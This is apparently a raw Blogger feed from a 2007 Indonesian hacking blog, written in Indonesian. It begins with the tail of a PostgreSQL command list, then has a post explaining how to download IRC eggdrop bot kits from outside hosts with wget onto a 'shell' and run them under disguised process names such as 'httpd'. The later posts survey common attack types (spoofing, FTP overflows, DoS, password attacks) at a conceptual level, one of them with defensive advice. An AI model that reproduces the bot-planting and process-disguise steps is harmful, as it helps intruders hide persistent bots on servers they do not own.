INDEX -- define a new index&lt;br /&gt;CREATE LANGUAGE -- define a new procedural language&lt;br /&gt;CREATE OPERATOR -- define a new operator&lt;br /&gt;CREATE OPERATOR CLASS -- define a new operator class for indexes&lt;br /&gt;CREATE RULE -- define a new rewrite rule&lt;br /&gt;CREATE SCHEMA -- define a new schema&lt;br /&gt;CREATE SEQUENCE -- define a new sequence generator&lt;br /&gt;CREATE TABLE -- define a new table&lt;br /&gt;CREATE TABLE AS -- create a new table from the results of a query&lt;br /&gt;CREATE TRIGGER -- define a new trigger&lt;br /&gt;CREATE TYPE -- define a new data type&lt;br /&gt;CREATE USER -- define a new database user account&lt;br /&gt;CREATE VIEW -- define a new view&lt;br /&gt;DEALLOCATE -- remove a prepared query&lt;br /&gt;DECLARE -- define a cursor&lt;br /&gt;DELETE -- delete rows of a table&lt;br /&gt;DROP AGGREGATE -- remove a user-defined aggregate function&lt;br /&gt;DROP CAST -- remove a user-defined cast&lt;br /&gt;DROP CONVERSION -- remove a user-defined conversion&lt;br /&gt;DROP DATABASE -- remove a database&lt;br /&gt;DROP DOMAIN -- remove a user-defined domain&lt;br /&gt;DROP FUNCTION -- remove a user-defined function&lt;br /&gt;DROP GROUP -- remove a user group&lt;br /&gt;DROP INDEX -- remove an index&lt;br /&gt;DROP LANGUAGE -- remove a user-defined procedural language&lt;br /&gt;DROP OPERATOR -- remove a user-defined operator&lt;br /&gt;DROP OPERATOR CLASS -- remove a user-defined operator class&lt;br /&gt;DROP RULE -- remove a rewrite rule&lt;br /&gt;DROP SCHEMA -- remove a schema&lt;br /&gt;DROP SEQUENCE -- remove a sequence&lt;br /&gt;DROP TABLE -- remove a table&lt;br /&gt;DROP TRIGGER -- remove a trigger&lt;br /&gt;DROP TYPE -- remove a user-defined data type&lt;br /&gt;DROP USER -- remove a database user account&lt;br /&gt;DROP VIEW -- remove a view&lt;br /&gt;END -- commit the current transaction&lt;br /&gt;EXECUTE -- execute a prepared query&lt;br /&gt;EXPLAIN -- show the execution plan of a statement&lt;br /&gt;FETCH -- retrieve rows from a table using a cursor&lt;br /&gt;GRANT -- define access privileges&lt;br /&gt;INSERT -- create new rows in a table&lt;br /&gt;LISTEN -- listen for a notification&lt;br /&gt;LOAD -- load or reload a shared library file&lt;br /&gt;LOCK -- explicitly lock a table&lt;br /&gt;MOVE -- position a cursor on a specified row of a table&lt;br /&gt;NOTIFY -- generate a notification&lt;br /&gt;PREPARE -- create a prepared query&lt;br /&gt;REINDEX -- rebuild corrupted indexes&lt;br /&gt;RESET -- restore the value of a run-time parameter to a default value&lt;br /&gt;REVOKE -- remove access privileges&lt;br /&gt;ROLLBACK -- abort the current transaction&lt;br /&gt;SELECT -- retrieve rows from a table or view&lt;br /&gt;SELECT INTO -- create a new table from the results of a query&lt;br /&gt;SET -- change a run-time parameter&lt;br /&gt;SET CONSTRAINTS -- set the constraint mode of the current transaction&lt;br /&gt;SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session&lt;br /&gt;SET TRANSACTION -- set the characteristics of the current transaction&lt;br /&gt;SHOW -- show the value of a run-time parameter&lt;br /&gt;START TRANSACTION -- start a transaction block&lt;br /&gt;TRUNCATE -- empty a table&lt;br /&gt;UNLISTEN -- stop listening for a notification&lt;br /&gt;UPDATE -- update rows of a table&lt;br /&gt;VACUUM -- garbage-collect and optionally analyze a database&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-6182461271735012474?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/6182461271735012474'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/6182461271735012474'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/konsep-dasar-sql-injection.html' title='Konsep Dasar SQL Injection'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-7881864336240937906</id><published>2007-09-29T03:28:00.000+07:00</published><updated>2007-09-29T03:32:08.648+07:00</updated><title type='text'>Cara Mudah Untuk membuat BOT</title><content type='html'>NB: BOT Ini akan otomatis jalan pada server dalnet ” Husus Untuk dalnet server “&lt;br /&gt;&lt;br /&gt;1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz&lt;br /&gt;&lt;br /&gt;atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 &lt;–untuk tambahan creat.tcl&lt;br /&gt;&lt;br /&gt;2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz&lt;br /&gt;&lt;br /&gt;tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2&lt;br /&gt;&lt;br /&gt;3. cd .kin&lt;br /&gt;&lt;br /&gt;4. ./creat fileconf nick ident IP channel owner&lt;br /&gt;&lt;br /&gt; contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek&lt;br /&gt;&lt;br /&gt;defaced……………….. file conf yg akan dibuat (akan terbuat dgn sendirinya)&lt;br /&gt;&lt;br /&gt;s4nd4l_j3p1t ……………nick bot&lt;br /&gt;&lt;br /&gt;s4nd4l ……………….ident bot&lt;br /&gt;&lt;br /&gt;212.88.174.3 …….IP shell &lt;bisa dilihat dengan menggunakan command /sbin/ifconfig atau cat /etc/hosts&lt;br /&gt;&lt;br /&gt;defaced ………………… nama channel, jangan pake #&lt;br /&gt;&lt;br /&gt;g4ptek ……………. nick owner&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)&lt;br /&gt;&lt;br /&gt;contoh: mich`keren -&gt; mich\`keren&lt;br /&gt;&lt;br /&gt; 5. ./eggdrop -m fileconf&lt;br /&gt;&lt;br /&gt;atau ./run fileconf fakename&lt;br /&gt;&lt;br /&gt;fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat&lt;br /&gt;&lt;br /&gt; contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)&lt;br /&gt;&lt;br /&gt;Udah deh! tunggu aja di channel, ato whois aja nicknya.&lt;br /&gt;&lt;br /&gt;Bila ingin tambahkan tcl lain seperti creat.tcl &lt;khusus pada kinabot.tar.bz2&gt;:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;2. ./tcl -t fileconf creat.tcl&lt;br /&gt;&lt;br /&gt;contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )&lt;br /&gt;&lt;br /&gt;untuk penggunaan bisa diliat dengan command/perintah !creat dichannel&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cara Mudah Untuk membuat BOT II&lt;br /&gt;&lt;br /&gt;wget http://geocities.com/g4ptek/tools/bot.tar.gz&lt;br /&gt;&lt;br /&gt;   tar -zxvf bot.tar.gz&lt;br /&gt;&lt;br /&gt;   rm -rf bot.tar.gz&lt;br /&gt;&lt;br /&gt;   cd .share&lt;br /&gt;&lt;br /&gt;# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi&lt;br /&gt;&lt;br /&gt;# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt&lt;br /&gt;&lt;br /&gt;# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr     http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/&lt;br /&gt;&lt;br /&gt;# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi&lt;br /&gt;&lt;br /&gt;   ./shade “httpd” ./eggdrop -m bot.txt&lt;br /&gt;&lt;br /&gt;# usage:&lt;br /&gt;&lt;br /&gt;# pv bot kamu di channel&lt;br /&gt;&lt;br /&gt;# /msg nick-bot-kamu auth &lt;passwd&gt;&lt;br /&gt;&lt;br /&gt;# /msg nick-bot-kamu pass &lt;passwd&gt;&lt;br /&gt;&lt;br /&gt;# /msg nick-bot-kamu auth &lt;passwd&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;Selamat BikiN Bot….&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-7881864336240937906?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7881864336240937906'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7881864336240937906'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-mudah-untuk-membuat-bot_29.html' title='Cara Mudah Untuk membuat BOT'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2028466759663583440</id><published>2007-09-27T17:20:00.000+07:00</published><updated>2007-09-27T17:22:39.950+07:00</updated><title type='text'>cara dan jenis hacker menyerang situs..</title><content type='html'>Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap&lt;br /&gt;server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6&lt;br /&gt;kelas, yaitu:&lt;br /&gt;&lt;br /&gt;Intrusion&lt;br /&gt;Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat&lt;br /&gt;menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted&lt;br /&gt;dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk&lt;br /&gt;menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam&lt;br /&gt;skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).&lt;br /&gt;Hacking is an Art!? =)&lt;br /&gt;&lt;br /&gt;Denial of Services (DoS)&lt;br /&gt;Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran&lt;br /&gt;request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)&lt;br /&gt;misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting&lt;br /&gt;request pada server secara serentak asimetris dan simultan sehingga buffer server akan&lt;br /&gt;kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?&lt;br /&gt;(servicenya mati masak dibilang server? hehehe....)&lt;br /&gt;&lt;br /&gt;Joyrider&lt;br /&gt;Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa&lt;br /&gt;belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat&lt;br /&gt;(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).&lt;br /&gt;Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe&lt;br /&gt;menyebabkan kerusakan atau kehilangan data.&lt;br /&gt;&lt;br /&gt;Vandal&lt;br /&gt;Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)&lt;br /&gt;&lt;br /&gt;Scorekeeper&lt;br /&gt;Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya&lt;br /&gt;berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan&lt;br /&gt;kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).&lt;br /&gt;Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.&lt;br /&gt;&lt;br /&gt;Spy&lt;br /&gt;Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin&lt;br /&gt;target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang&lt;br /&gt;kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya&lt;br /&gt;&lt;br /&gt;______________________&lt;br /&gt;&lt;br /&gt;ntar yang laen tambah nech Laughing&lt;br /&gt;_________________&lt;br /&gt;I'm nothing&lt;br /&gt;QUICK EDIT YOUR POST&lt;br /&gt; LaST&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sersan Kepala&lt;br /&gt;Sersan Kepala&lt;br /&gt;&lt;br /&gt;Posts: 321&lt;br /&gt;&lt;br /&gt;Reputation: 11   &lt;br /&gt;&lt;br /&gt;Joined: 11 Apr 2007&lt;br /&gt;Location: behind your system&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;LaST is offline &lt;br /&gt;View user's profile Send private message Send e-mail Visit poster's website Yahoo Messenger    &lt;br /&gt; &lt;br /&gt; Back to top&lt;br /&gt;PostPosted: Tue Jul 31, 2007 12:12 am    Post subject:  Reply with quote&lt;br /&gt;QUICK EDIT YOUR POST&lt;br /&gt;&lt;br /&gt;Attach signature (signatures can be changed in profile) close&lt;br /&gt;1. IP Spoofing&lt;br /&gt;IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga&lt;br /&gt;sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar&lt;br /&gt;network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan&lt;br /&gt;serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari&lt;br /&gt;Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’&lt;br /&gt;packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk&lt;br /&gt;routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah&lt;br /&gt;untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker&lt;br /&gt;tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.&lt;br /&gt;&lt;br /&gt;2. FTP Attack&lt;br /&gt;Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang&lt;br /&gt;diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk&lt;br /&gt;mendapatkan command shell ataupun untuk melakukan Denial Of Service.&lt;br /&gt;Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil&lt;br /&gt;resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang&lt;br /&gt;attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa&lt;br /&gt;membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang&lt;br /&gt;diserang.&lt;br /&gt;Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering&lt;br /&gt;dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.&lt;br /&gt;Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di&lt;br /&gt;upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow&lt;br /&gt;Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce&lt;br /&gt;attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff&lt;br /&gt;informasi yang berada dalam sistem&lt;br /&gt;&lt;br /&gt;3. Unix Finger Exploits&lt;br /&gt;Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi&lt;br /&gt;diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan&lt;br /&gt;peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang&lt;br /&gt;sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk&lt;br /&gt;melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga&lt;br /&gt;menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada&lt;br /&gt;dalam sistem dan seberapa jauh user merawat sistem.&lt;br /&gt;Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah&lt;br /&gt;sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi&lt;br /&gt;seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk&lt;br /&gt;memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.&lt;br /&gt;&lt;br /&gt;4. Flooding &amp; Broadcasting&lt;br /&gt;Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara&lt;br /&gt;significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa&lt;br /&gt;menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan&lt;br /&gt;dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua&lt;br /&gt;station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini&lt;br /&gt;adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya&lt;br /&gt;menyerah.&lt;br /&gt;Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or&lt;br /&gt;volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas&lt;br /&gt;besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu&lt;br /&gt;network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup&lt;br /&gt;power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas&lt;br /&gt;proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar&lt;br /&gt;akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.&lt;br /&gt;&lt;br /&gt;5. Fragmented Packet Attacks&lt;br /&gt;Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya&lt;br /&gt;mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa&lt;br /&gt;firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi&lt;br /&gt;alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.&lt;br /&gt;Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk&lt;br /&gt;menulis ulang informasi paket pertama dari suatu protokol.&lt;br /&gt;&lt;br /&gt;6. E-mail Exploits&lt;br /&gt;Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command&lt;br /&gt;manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode&lt;br /&gt;(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email&lt;br /&gt;bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file&lt;br /&gt;aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).&lt;br /&gt;&lt;br /&gt;7. DNS and BIND Vulnerabilities&lt;br /&gt;Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain&lt;br /&gt;(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis&lt;br /&gt;yang diarahkan pada operasi dasar dari Internet (basic internet operation).&lt;br /&gt;&lt;br /&gt;8. Password Attacks&lt;br /&gt;Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak&lt;br /&gt;perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi&lt;br /&gt;online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.&lt;br /&gt;Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin&lt;br /&gt;saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka&lt;br /&gt;sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang&lt;br /&gt;dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih&lt;br /&gt;karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat&lt;br /&gt;meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai&lt;br /&gt;hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak&lt;br /&gt;(guessing), brute force, cracking dan sniffing.&lt;br /&gt;&lt;br /&gt;9.Proxy Server Attacks&lt;br /&gt;Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan&lt;br /&gt;proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai&lt;br /&gt;kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem&lt;br /&gt;saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.&lt;br /&gt;&lt;br /&gt;10. Remote Command Processing Attacks&lt;br /&gt;Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource&lt;br /&gt;sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota&lt;br /&gt;network kekuasaan akses yang sama di satu dan lain system (dalam network).&lt;br /&gt;Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan&lt;br /&gt;pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi&lt;br /&gt;perintah dan mengkases data yang tersedia bagi user lainnya.&lt;br /&gt;&lt;br /&gt;11. Remote File System Attack&lt;br /&gt;Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)&lt;br /&gt;yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network&lt;br /&gt;dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk&lt;br /&gt;mendapatkan akses ke direktori file.&lt;br /&gt;&lt;br /&gt;12. Selective Program Insertions&lt;br /&gt;Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program&lt;br /&gt;penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada&lt;br /&gt;system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini&lt;br /&gt;mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan&lt;br /&gt;membuka backdoor.&lt;br /&gt;&lt;br /&gt;13. Port Scanning&lt;br /&gt;Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai&lt;br /&gt;macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.&lt;br /&gt;Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk&lt;br /&gt;publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.&lt;br /&gt;&lt;br /&gt;14.TCP/IP Sequence Stealing, Passive Port Listening and Packet&lt;br /&gt;Interception&lt;br /&gt;TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan&lt;br /&gt;informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,&lt;br /&gt;serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.&lt;br /&gt;&lt;br /&gt;15. HTTPD Attacks&lt;br /&gt;Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd&lt;br /&gt;bypasses, cross scripting, web code vulnerabilities, dan URL floods.&lt;br /&gt;HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan&lt;br /&gt;untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat&lt;br /&gt;overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan&lt;br /&gt;string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker&lt;br /&gt;akses ke command prompt. Smile Beer&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2028466759663583440?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2028466759663583440'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2028466759663583440'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-dan-jenis-hacker-menyerang-situs.html' title='cara dan jenis hacker menyerang situs..'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-7221992551555709163</id><published>2007-09-27T17:13:00.000+07:00</published><updated>2007-09-27T17:14:59.879+07:00</updated><title type='text'>15 Jenis Serangan Cracker</title><content type='html'>15 Jenis Serangan Cracker&lt;br /&gt;&lt;br /&gt;Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan. Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya (walaupun serangan tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.&lt;br /&gt;&lt;br /&gt;Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan seranganserangan umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.&lt;br /&gt;&lt;br /&gt;IP Spoofing&lt;br /&gt;&lt;br /&gt;IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)&lt;br /&gt;dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.&lt;br /&gt;&lt;br /&gt;Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikandan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.&lt;br /&gt;&lt;br /&gt;Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.&lt;br /&gt;&lt;br /&gt;FTP Attack&lt;br /&gt;&lt;br /&gt;Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service.&lt;br /&gt;&lt;br /&gt;Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network 